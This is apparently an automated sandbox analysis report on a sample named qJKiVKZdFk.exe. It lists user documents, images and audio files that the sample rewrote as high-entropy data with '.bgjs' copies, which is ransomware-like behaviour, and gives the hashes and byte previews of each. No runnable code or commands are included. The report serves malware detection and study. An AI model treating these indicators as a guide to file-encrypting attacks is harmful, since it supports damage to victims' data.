                                                                                                                                      Preview:NWCXB...4.J.`..NQ.&i......$.........._........<..Ia....6.......Y.7..n.....VD....'...kpv...e.Cb.Bs~..T.g...}D...4..s;.-..!G=..)%1....6d.*g'...v..{..C. u...Z.jiK..X#.q......9..~....n.(..P.:A..jR...(_b..D..p..C0.l...q!.].....~....'g..i]D.bFh".....K.7..Kp..u.a.O..n].*.iz.>.V._...n.D..o...L.3.LD.`.3x..A:....0...f.....f..P.<z6....bxaFv@.........@Ep8.:..Q..(......c*....=...7..fx...M.v...rg...pl...."0...8..,E..M....;.._pkw..[.8..U.u......=t..N&tRN..d...6.9....]..q.G^H^(~...{....d.Xx..11=G....t..2..?[..._.XB,m.....T..;.X....TVr..p.K2.'.."N.a..0.....lQ6..ELr...... 6.....m._..=...w(..@e..Q..;..SW..8~.e..=..7l..c.>...*b.......Hg.....-... ...a.A...x...?..AP2...9...8.K....&w..M....Z....Q*.6w.....?.]sU.........}b.%$..}...H..0..t.;...Q+&>.....IO|.>S'..g...h....0.._...!>.E{....P.M..*>..]C..+g_.eg.....Q..<z....E.`.wp....;.....9.y..0 f).3.Id._.(................I.6... i...%..W.*..K..$...+.P.<#"....n.=<w\C....&..R..c[....!..................2..S.e.I..a.6..g}.Q.{..w.:..

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.844713853741714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GGZk9ORQcbZr5qffejNmi02s7ZB48D0TgxgKWfOaOCDehh3y1C5hoN4ENJbD:GGZVQcLqejAigZUTJsaO7vx+D
                                                                                                                                      MD5:C324D32339249471DD178CAC405D1413
                                                                                                                                      SHA1:C3FE0E4EDF50C739C1F943E885433CE94F921381
                                                                                                                                      SHA-256:D6909C6960AA844C5A40BAFD4EDAF91B054D4474DFF096BAFCD9166FA144F0D9
                                                                                                                                      SHA-512:D635B1F30269692D9FEB31AEAFCC96B8724D0035E316107B6D9EF277343190773C140AF4A3B1D757A4DEEFD51A9013665992C3DA154D6CDCB79939A4B9D7BBB9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP..w.b....B...Z:.S..XE..'.-.....AN....@...h.`..}.P.7.D5.e....O].<.5....0m...j......U...'M(.%......]....?..A..a......T.6....ZV...#6.nkR&....t.rW...9.._..Kx.jC3c^J.l..A2.....8S..#`..S...Va.}+<.+..-h.+j.;'.agOP....$.._..A...R..fK...9..|.~..^....:.;FA...jY-..b..../>..~..Z.........H.!.".1[...\....l.J..h.O....p...p.:B..@G./...M|N]m.#.-Db...1...&.]G4.^.wh....^..p..)......~.|`.%.JF.lz]...3..".ZY.!..eFU5^........ ...S.....R...'.M6.?.Og.n#].:. ...a6....g.o..2ge..\.....1.`..#.{..U^J.=.2.U.C...j...p.Y...h.?..9QQ.....%.H.`.1.<.D.5.d........`..NBnq.$.h.1.[,....8..c...._T...x.`}...fj=....a.Mz.....4,q....A...QGD....`u..rQ[.&~.....\~d...9H.L.U.. ...~I.UG...)...4.Y..9"......+|B5X......-...|Ly.fJpC/..Y.[R.w${..p.<.....A\.....<.0...cI..YR.P.2_.BE..[zF`m.. ..U....u..J.Z...U..A\..T.....K.Y.P..........4Bb..Q......x!.C.....$...X.1....J!..fN....7d..>...v.n.....[............!..<.....,....b"...p.1h.X......$..T......E.0.M..I....&P.)....N......R?m.U4.JP...2.L.RI.

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.844713853741714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GGZk9ORQcbZr5qffejNmi02s7ZB48D0TgxgKWfOaOCDehh3y1C5hoN4ENJbD:GGZVQcLqejAigZUTJsaO7vx+D
                                                                                                                                      MD5:C324D32339249471DD178CAC405D1413
                                                                                                                                      SHA1:C3FE0E4EDF50C739C1F943E885433CE94F921381
                                                                                                                                      SHA-256:D6909C6960AA844C5A40BAFD4EDAF91B054D4474DFF096BAFCD9166FA144F0D9
                                                                                                                                      SHA-512:D635B1F30269692D9FEB31AEAFCC96B8724D0035E316107B6D9EF277343190773C140AF4A3B1D757A4DEEFD51A9013665992C3DA154D6CDCB79939A4B9D7BBB9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP..w.b....B...Z:.S..XE..'.-.....AN....@...h.`..}.P.7.D5.e....O].<.5....0m...j......U...'M(.%......]....?..A..a......T.6....ZV...#6.nkR&....t.rW...9.._..Kx.jC3c^J.l..A2.....8S..#`..S...Va.}+<.+..-h.+j.;'.agOP....$.._..A...R..fK...9..|.~..^....:.;FA...jY-..b..../>..~..Z.........H.!.".1[...\....l.J..h.O....p...p.:B..@G./...M|N]m.#.-Db...1...&.]G4.^.wh....^..p..)......~.|`.%.JF.lz]...3..".ZY.!..eFU5^........ ...S.....R...'.M6.?.Og.n#].:. ...a6....g.o..2ge..\.....1.`..#.{..U^J.=.2.U.C...j...p.Y...h.?..9QQ.....%.H.`.1.<.D.5.d........`..NBnq.$.h.1.[,....8..c...._T...x.`}...fj=....a.Mz.....4,q....A...QGD....`u..rQ[.&~.....\~d...9H.L.U.. ...~I.UG...)...4.Y..9"......+|B5X......-...|Ly.fJpC/..Y.[R.w${..p.<.....A\.....<.0...cI..YR.P.2_.BE..[zF`m.. ..U....u..J.Z...U..A\..T.....K.Y.P..........4Bb..Q......x!.C.....$...X.1....J!..fN....7d..>...v.n.....[............!..<.....,....b"...p.1h.X......$..T......E.0.M..I....&P.)....N......R?m.U4.JP...2.L.RI.

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861294915495289
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8YXKUlpM1TbpRF/pExZMCMietp9E5oNxDbgd2YYLd/5ffDsFCli2WH2viQ66Kp2j:DhT4bdC6tp9TLbc2YY/ffDQCuHeibnpq
                                                                                                                                      MD5:EE9DDD5DB3A370EEE931153619B44401
                                                                                                                                      SHA1:1CBD5A73CB321EAA23F2165521004F8EC8727856
                                                                                                                                      SHA-256:91C3028671C6A66F4E70ECA182AD2DF2977B041ED3E82EE8E28BF47B5664C7A7
                                                                                                                                      SHA-512:8F70336AA68C7A50D016AA9F45000604B51C5E0593AF27B4530311763F5737BDE9871936AD8316B1EC2BE3ECC063146F7176409E4586012C63D8ED3354B125EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL...^f.X..:.(EC..j...d.....*..l.2.....J.;...k.R....C.%.jR.S.^........yw:F.i\D/.l.....u.......y......Z.../.Z=..B(...}.U..Og.C,.,_;..=.XU...a.!.......}oAFP#.e..&.$.9Ls.?n.T.......%.Ep.5"..\.i\j........s.A.[......P#>...(....U.'.T.f....v...v.......5...U...d.....>.%.9B..&.....v..^......E&..m.!g........ ....X.G.R.^.4.]...L....h.B..Q.T. ...I.c5.3..?XrJ!e.......;Z.}K;....GS.g.''"...p..z<W:....V..\.d.].Nk+[0'.4...&.H...zt...PhO,...?.\.n1..Z..r..}..|...1Yl^..n...)...O.R...M..J8..AX28.,U.U<. .N..?..Nl&...&....!..'.._....1...O..;_...J...]..*z.3w($..a.[Oj...Pq.......:%.......oo....U1.t.]].......N5_..-..>....G.IT.leJ....K.pS.C..3.s.>l..b..t`N.u.]}....Re .......%g.O....-.k..a$.s@..=..|.b.*&.i.....?...IG|..m...[8T.G.......F*.+.~Q@..p..v.9Z..C]....|. ....m.iw...fJ........K....K#.....{....r..e..F..........j;Y.&...@......k...f*J..%xJ'.0....*.......B....z.m.........u.Y:o=-...P.....G...a.......u.v.C..D..&..Bn. ..x#K.8E.z.m.............N........$*.1.....]

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861294915495289
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8YXKUlpM1TbpRF/pExZMCMietp9E5oNxDbgd2YYLd/5ffDsFCli2WH2viQ66Kp2j:DhT4bdC6tp9TLbc2YY/ffDQCuHeibnpq
                                                                                                                                      MD5:EE9DDD5DB3A370EEE931153619B44401
                                                                                                                                      SHA1:1CBD5A73CB321EAA23F2165521004F8EC8727856
                                                                                                                                      SHA-256:91C3028671C6A66F4E70ECA182AD2DF2977B041ED3E82EE8E28BF47B5664C7A7
                                                                                                                                      SHA-512:8F70336AA68C7A50D016AA9F45000604B51C5E0593AF27B4530311763F5737BDE9871936AD8316B1EC2BE3ECC063146F7176409E4586012C63D8ED3354B125EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL...^f.X..:.(EC..j...d.....*..l.2.....J.;...k.R....C.%.jR.S.^........yw:F.i\D/.l.....u.......y......Z.../.Z=..B(...}.U..Og.C,.,_;..=.XU...a.!.......}oAFP#.e..&.$.9Ls.?n.T.......%.Ep.5"..\.i\j........s.A.[......P#>...(....U.'.T.f....v...v.......5...U...d.....>.%.9B..&.....v..^......E&..m.!g........ ....X.G.R.^.4.]...L....h.B..Q.T. ...I.c5.3..?XrJ!e.......;Z.}K;....GS.g.''"...p..z<W:....V..\.d.].Nk+[0'.4...&.H...zt...PhO,...?.\.n1..Z..r..}..|...1Yl^..n...)...O.R...M..J8..AX28.,U.U<. .N..?..Nl&...&....!..'.._....1...O..;_...J...]..*z.3w($..a.[Oj...Pq.......:%.......oo....U1.t.]].......N5_..-..>....G.IT.leJ....K.pS.C..3.s.>l..b..t`N.u.]}....Re .......%g.O....-.k..a$.s@..=..|.b.*&.i.....?...IG|..m...[8T.G.......F*.+.~Q@..p..v.9Z..C]....|. ....m.iw...fJ........K....K#.....{....r..e..F..........j;Y.&...@......k...f*J..%xJ'.0....*.......B....z.m.........u.Y:o=-...P.....G...a.......u.v.C..D..&..Bn. ..x#K.8E.z.m.............N........$*.1.....]

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.844018801611115
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:oHr0lX+NcUCRbbjZm8TdUUZl4pM6ci0yWNvA2Codn2fSlhkSn8gVNKxbD:oLwOe7R9tWUTIci0ywAXodn2fSrkSn8t
                                                                                                                                      MD5:BC4362902CB44BA34531B0E8844D8E8E
                                                                                                                                      SHA1:0D9417AEE8290D3F3A19C33BF24360CB6952B622
                                                                                                                                      SHA-256:AD539798E0361A71C5FDF3175A60E694D71BCB7AB5B86F0D8473D27992FA79E7
                                                                                                                                      SHA-512:7F79F9F31720F380EEA3BF4F327D438C5275A1C32071503D3DDD7F3825CDCB3B5B71D144B47C4086244D39022A1D6E8D9454F609634F2EA678BFC00DDD5E5DC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY..x>9....G.....5ic'..D..b....3\......}3:O.a........s.ju(D..*C...~4.}.:X.|s..$f..q.....?y...W..~..\.4.q5.yd)......+...q....F.....d.E.<..)=.K}P.h...l8...u.].!..W).h....B.h"...yWQ!g.?c&k.A..*.*{x..Gx.%J......=1,...]...~.ku.h......Z..@......|z.....e.T>.|....+I)...y..T_.(....|f.R..r$Ey~._S.x..n.zx.Ui..RNj5.t..k@....<.....N."\....T..9.<z.$..w.5.5.z.m..g.$..bD....Dk.@..:6.&r....u.x..oD..V..x)..=..s.&3...d&..f.. _..q.,...15{1.C5.S..a.S..y.}HG..q......N.A%V.....*i..Y.C. .%...5.<P2.c'7.r.@.Oggq...$q.q*z.5.<.f..|..-...n.....;6.7...O..0y..Z4-i...#..e.a.s...?.p4.&...X.8.)...._..T.G..W.gT.....Y.x..;..)m.u..n.`..RG.bY.r..F...+...PbD^..H.P..?w......M!.........Ed.2. .L_..H}..h..........PZ..i.q.R:!q...&.>........ygn^.I..sT.....1..LZd.O.K...Pc.eZ2.(.+...M.to....E.>0.i..>...d.f....1~.=.......t.Hi.).0 s.cA..6#.......JOPM.....<hEf1.o7.=~.w`.#[3^:..x[... .kp............]..<...#O4U.)...`.H...f S...qo.%Tf..x..R.do#..[:....Q.P;.{....l%.v.=..n..^-..>Q..[.

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.844018801611115
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:oHr0lX+NcUCRbbjZm8TdUUZl4pM6ci0yWNvA2Codn2fSlhkSn8gVNKxbD:oLwOe7R9tWUTIci0ywAXodn2fSrkSn8t
                                                                                                                                      MD5:BC4362902CB44BA34531B0E8844D8E8E
                                                                                                                                      SHA1:0D9417AEE8290D3F3A19C33BF24360CB6952B622
                                                                                                                                      SHA-256:AD539798E0361A71C5FDF3175A60E694D71BCB7AB5B86F0D8473D27992FA79E7
                                                                                                                                      SHA-512:7F79F9F31720F380EEA3BF4F327D438C5275A1C32071503D3DDD7F3825CDCB3B5B71D144B47C4086244D39022A1D6E8D9454F609634F2EA678BFC00DDD5E5DC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY..x>9....G.....5ic'..D..b....3\......}3:O.a........s.ju(D..*C...~4.}.:X.|s..$f..q.....?y...W..~..\.4.q5.yd)......+...q....F.....d.E.<..)=.K}P.h...l8...u.].!..W).h....B.h"...yWQ!g.?c&k.A..*.*{x..Gx.%J......=1,...]...~.ku.h......Z..@......|z.....e.T>.|....+I)...y..T_.(....|f.R..r$Ey~._S.x..n.zx.Ui..RNj5.t..k@....<.....N."\....T..9.<z.$..w.5.5.z.m..g.$..bD....Dk.@..:6.&r....u.x..oD..V..x)..=..s.&3...d&..f.. _..q.,...15{1.C5.S..a.S..y.}HG..q......N.A%V.....*i..Y.C. .%...5.<P2.c'7.r.@.Oggq...$q.q*z.5.<.f..|..-...n.....;6.7...O..0y..Z4-i...#..e.a.s...?.p4.&...X.8.)...._..T.G..W.gT.....Y.x..;..)m.u..n.`..RG.bY.r..F...+...PbD^..H.P..?w......M!.........Ed.2. .L_..H}..h..........PZ..i.q.R:!q...&.>........ygn^.I..sT.....1..LZd.O.K...Pc.eZ2.(.+...M.to....E.>0.i..>...d.f....1~.=.......t.Hi.).0 s.cA..6#.......JOPM.....<hEf1.o7.=~.w`.#[3^:..x[... .kp............]..<...#O4U.)...`.H...f S...qo.%Tf..x..R.do#..[:....Q.P;.{....l%.v.=..n..^-..>Q..[.

                                                                                                                                      C:\Users\user\Desktop\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.827675542898034
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fd+sjD8hsr88FJuWVSuAtFu7w2F/QhrxxkwgfweVx9qZ7Jy0vtV5FP4jfKSyZbD:fd+svzFIkSSU2qhrvkXdVky0r5V4jZyR
                                                                                                                                      MD5:4F44D2D475140B8B5B5529D0975F7C9B
                                                                                                                                      SHA1:CEDF13D910E7CFA95C0036BB40C35B105E28E33E
                                                                                                                                      SHA-256:195B3D6A60B7CB6641A7D1B9EC3BFA535CD321D49D8E07B8345027C27BCAD074
                                                                                                                                      SHA-512:B1CA6A4B8306CDC28AA04DF191AEDCA5DE2F92E3A413AC64B5F16DF81FC2660258C4A4B42BC47ED31E6CF74C6E6ECA02E0237BB8E79F61F2AC518E78195C035C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP.....%.^....ke]w..._.n.}.\5....tO.f.E.<..J../........`.,TM..YK.L>..H`.J|....BY.8..NZZ.^.}........X..Y...L..{R...d...[4..(=K/.5y.m.0....,...0_. ~.$.7.....k..6.E..@.:..P1.-:..>..."5.[.{O=......P.._....Ox..h.R..d ..#..:...".(..8....l.`....V./..&j.f..@... 0N....nanQY&..iw%..?.....3.Q.GvJX.@.N..@.)\.....%..[....W.t[..IAC...@ .-.2I..c..!.=.......E...W...r...J...2F.....Z....1.I..Ji.[.j....o...@.M..B..8..Ig%...E.9. ........7.k.p.S.../4..f.wv^.......L1.@.JQ(..n...k.......5[...A!.s......L.{.........5.O._...ulE-Y.{...|...<+../.].:...*.V.V........p/w5%.!.X%..1Z.9.9bkQ..(.^....]#r.Wj~v/......?.X...f\.l...... ....e...>V@.v....3.z...Xh....Z...d.Q.w,. .F^./?UsI}k...n.w-i..E&}..P\....S....t..y.0.3.L.=L.......&L......~.oPw\.)..Q.!]....S...#..A...9J..0.)..-.O.1.\..5......5..S.....^.+.m.Z.....RC..,/.xdy.-....\..M]'.}..;.i..Z.........] .z.>snQ...*...b.%2HM.)a#...S.....V.]c.. CKW....+....._C.Rp/..........1..u../uR.....P3.......q....K....,/.....G...<.{/..

                                                                                                                                      C:\Users\user\Desktop\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.827675542898034
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fd+sjD8hsr88FJuWVSuAtFu7w2F/QhrxxkwgfweVx9qZ7Jy0vtV5FP4jfKSyZbD:fd+svzFIkSSU2qhrvkXdVky0r5V4jZyR
                                                                                                                                      MD5:4F44D2D475140B8B5B5529D0975F7C9B
                                                                                                                                      SHA1:CEDF13D910E7CFA95C0036BB40C35B105E28E33E
                                                                                                                                      SHA-256:195B3D6A60B7CB6641A7D1B9EC3BFA535CD321D49D8E07B8345027C27BCAD074
                                                                                                                                      SHA-512:B1CA6A4B8306CDC28AA04DF191AEDCA5DE2F92E3A413AC64B5F16DF81FC2660258C4A4B42BC47ED31E6CF74C6E6ECA02E0237BB8E79F61F2AC518E78195C035C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP.....%.^....ke]w..._.n.}.\5....tO.f.E.<..J../........`.,TM..YK.L>..H`.J|....BY.8..NZZ.^.}........X..Y...L..{R...d...[4..(=K/.5y.m.0....,...0_. ~.$.7.....k..6.E..@.:..P1.-:..>..."5.[.{O=......P.._....Ox..h.R..d ..#..:...".(..8....l.`....V./..&j.f..@... 0N....nanQY&..iw%..?.....3.Q.GvJX.@.N..@.)\.....%..[....W.t[..IAC...@ .-.2I..c..!.=.......E...W...r...J...2F.....Z....1.I..Ji.[.j....o...@.M..B..8..Ig%...E.9. ........7.k.p.S.../4..f.wv^.......L1.@.JQ(..n...k.......5[...A!.s......L.{.........5.O._...ulE-Y.{...|...<+../.].:...*.V.V........p/w5%.!.X%..1Z.9.9bkQ..(.^....]#r.Wj~v/......?.X...f\.l...... ....e...>V@.v....3.z...Xh....Z...d.Q.w,. .F^./?UsI}k...n.w-i..E&}..P\....S....t..y.0.3.L.=L.......&L......~.oPw\.)..Q.!]....S...#..A...9J..0.)..-.O.1.\..5......5..S.....^.+.m.Z.....RC..,/.xdy.-....\..M]'.}..;.i..Z.........] .z.>snQ...*...b.%2HM.)a#...S.....V.]c.. CKW....+....._C.Rp/..........1..u../uR.....P3.......q....K....,/.....G...<.{/..

                                                                                                                                      C:\Users\user\Desktop\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855242074779198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6n/stJs5n7oIFy7lZ68zWnezZS5umb9r9Z9rZf4zQdH6hEuOmZOmUl22+xAKydpj:607sdH87W8ynedQumbfFfoQghnOfb229
                                                                                                                                      MD5:02BA672E4FCAED165AFF5F68C1B765BA
                                                                                                                                      SHA1:8BFF35658BB88FD963AC37335FCFCF5263CDFFE3
                                                                                                                                      SHA-256:5504CC11DCA5802ACBDDF94373B5A3F6E175C3556F3BA0C9595E737B297F3B79
                                                                                                                                      SHA-512:10E869E0E29310D3180FD6A43C40C7FCB8EAC92E269B0EF3FB06353E66D204F70A47601A25BE6AA8C74CBD80EA58B03A945FE926A3A8A940827E5AB3CBBD3B16
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY.<W..)..l.X5x3.]......bv.j..o...v...-..?..}..p.........O.`}...[J..F..zP..64....G^.KHC.H,......e..{K.\.M}...G0.>.w.~m.K.l.*@'a.Y.S.o......<.......t!..(..._f|5i.c..P.H.i...`^E.YU.:..)~.xZnQ4../i.0.....n+.. ....O..*7....R|u..w.-b.<,.N[.~..5..s.....Ws..B....'...A4.Jv.c....!U....c.r+E].k..Y0(M.. .<`.".q....1..Q.o.J..a.6u....N}.w.......!..R.....`.A..LH)......... .M...rG]......'.......h.....d.6X.0[.........#*".)......q41... 6..U..i....'..c8...h....-|R..n*&2.`.@...gM`+.~.\k.~'!=+1rU!.c..?./.+...;'...h....F.Ce...cg.{..m./....f.?.....|.=.8...s......l6..p#.......e..y.\..=,...@...b.1..[.....u.Z.6.*......YQ...g/GA{N.tI...c..@M.R........$./..7PEP..y^...L..)V.w......(t..9..0........s..Fg.W...}.c[g..9.x.]....CY\?.....{..>!.. ..O.E.....qh..a....(K69.}ES..nJ.f.....L.L.@....wr....n.....Q..H4...X...Y.{........|..*r...[=.y...~.$>7=.S%....`.4.b...g..r.-].'....u.z..~E.{.^....,.w....2.......>.N.."...c...{..j**A_..ss.gz.mY......5...AX;Z.Kti....U..d..G..v..

                                                                                                                                      C:\Users\user\Desktop\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855242074779198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6n/stJs5n7oIFy7lZ68zWnezZS5umb9r9Z9rZf4zQdH6hEuOmZOmUl22+xAKydpj:607sdH87W8ynedQumbfFfoQghnOfb229
                                                                                                                                      MD5:02BA672E4FCAED165AFF5F68C1B765BA
                                                                                                                                      SHA1:8BFF35658BB88FD963AC37335FCFCF5263CDFFE3
                                                                                                                                      SHA-256:5504CC11DCA5802ACBDDF94373B5A3F6E175C3556F3BA0C9595E737B297F3B79
                                                                                                                                      SHA-512:10E869E0E29310D3180FD6A43C40C7FCB8EAC92E269B0EF3FB06353E66D204F70A47601A25BE6AA8C74CBD80EA58B03A945FE926A3A8A940827E5AB3CBBD3B16
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY.<W..)..l.X5x3.]......bv.j..o...v...-..?..}..p.........O.`}...[J..F..zP..64....G^.KHC.H,......e..{K.\.M}...G0.>.w.~m.K.l.*@'a.Y.S.o......<.......t!..(..._f|5i.c..P.H.i...`^E.YU.:..)~.xZnQ4../i.0.....n+.. ....O..*7....R|u..w.-b.<,.N[.~..5..s.....Ws..B....'...A4.Jv.c....!U....c.r+E].k..Y0(M.. .<`.".q....1..Q.o.J..a.6u....N}.w.......!..R.....`.A..LH)......... .M...rG]......'.......h.....d.6X.0[.........#*".)......q41... 6..U..i....'..c8...h....-|R..n*&2.`.@...gM`+.~.\k.~'!=+1rU!.c..?./.+...;'...h....F.Ce...cg.{..m./....f.?.....|.=.8...s......l6..p#.......e..y.\..=,...@...b.1..[.....u.Z.6.*......YQ...g/GA{N.tI...c..@M.R........$./..7PEP..y^...L..)V.w......(t..9..0........s..Fg.W...}.c[g..9.x.]....CY\?.....{..>!.. ..O.E.....qh..a....(K69.}ES..nJ.f.....L.L.@....wr....n.....Q..H4...X...Y.{........|..*r...[=.y...~.$>7=.S%....`.4.b...g..r.-].'....u.z..~E.{.^....,.w....2.......>.N.."...c...{..j**A_..ss.gz.mY......5...AX;Z.Kti....U..d..G..v..

                                                                                                                                      C:\Users\user\Documents\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848936517651921
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tE6sf8ZPcNTZMyedWX6Uk6GrVkewW+0TwMMGj9pRdh4WKbD:iUZPc1ZM6X6z6VewW++j9pRdh4WoD
                                                                                                                                      MD5:BF63ED8964004E9A2A89A1F3101BC8EA
                                                                                                                                      SHA1:1A3688AF35344B827CAFDACCAB21B50436FE166F
                                                                                                                                      SHA-256:D525FE74AE81DE5DBB2E2B65DE628B6B4CD0533777A31F2FC8666A601CCEBDF1
                                                                                                                                      SHA-512:DB00247C9C6C5F5BA4975821D8769A366C4495AC0701B0A6880D02489E1370C2F16C10B61EB93384A068B259A6A71DD3B6995883FE4524F6726C1BBB1411AE7F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKSh.:.Q,23.C`.?{g.w.`....:.<.<.x.[.l.46Q63.J.m.......Q.^.'.\...n..~.UEm3..^V.87.lP{..?2q..l.Hc....{-......^.;.&.X>.KF......!...m.N..F...U...K.$.8.~.........B?w.^ .i.......=EP(..a...FH!(O.X`......T...o...^.NY\.}...t.Q.U.=.n....A6T.Ou.:F..).d@.._......X...?......1<..G..>.mW.J.N...=.....w.4.>w.Gl2......:...}b...}g..........iQA.$.. ...*B..W....A..*-.(.h.J.=...E............f.Q........#..n...Ku.:J.+..,$.........A.)R......r.d.M... ...OH..... '&9e../.X..A...D..B.)...$hI.K...#..`E.x..c.".{9.....Q.^Z.<..%.c.W..Q..T....}.(.?W|[..E...~..]2$9..'.38}..>. .[f.!.g..B!.N......zf.7..U...-..........;.c.p...0(.t.K......y}.%.T.Q.....w...eZ=8....h>..K.....?.u..'..+.a..$..\.O.sR....z.N.Y.m.%.Ks..~5....jO...+.=E+..|1..a....1..x...b..N..L.5.....t...c.6$...;*....Y._...c.HL.f.n F...;"0..+..4...,...V.qc7|'a.}#.r..N;...`.\`..0.t..W..<6....D......&..".QJ...#..xs..q..k..\.}..0.f..`..x.B......W...L{.O.'Gz..`2.T}.2qX....VQ?..]..........&...S...kT..,q......!.].e.

                                                                                                                                      C:\Users\user\Documents\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848936517651921
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tE6sf8ZPcNTZMyedWX6Uk6GrVkewW+0TwMMGj9pRdh4WKbD:iUZPc1ZM6X6z6VewW++j9pRdh4WoD
                                                                                                                                      MD5:BF63ED8964004E9A2A89A1F3101BC8EA
                                                                                                                                      SHA1:1A3688AF35344B827CAFDACCAB21B50436FE166F
                                                                                                                                      SHA-256:D525FE74AE81DE5DBB2E2B65DE628B6B4CD0533777A31F2FC8666A601CCEBDF1
                                                                                                                                      SHA-512:DB00247C9C6C5F5BA4975821D8769A366C4495AC0701B0A6880D02489E1370C2F16C10B61EB93384A068B259A6A71DD3B6995883FE4524F6726C1BBB1411AE7F
                                                                                                                                      Malicious:false
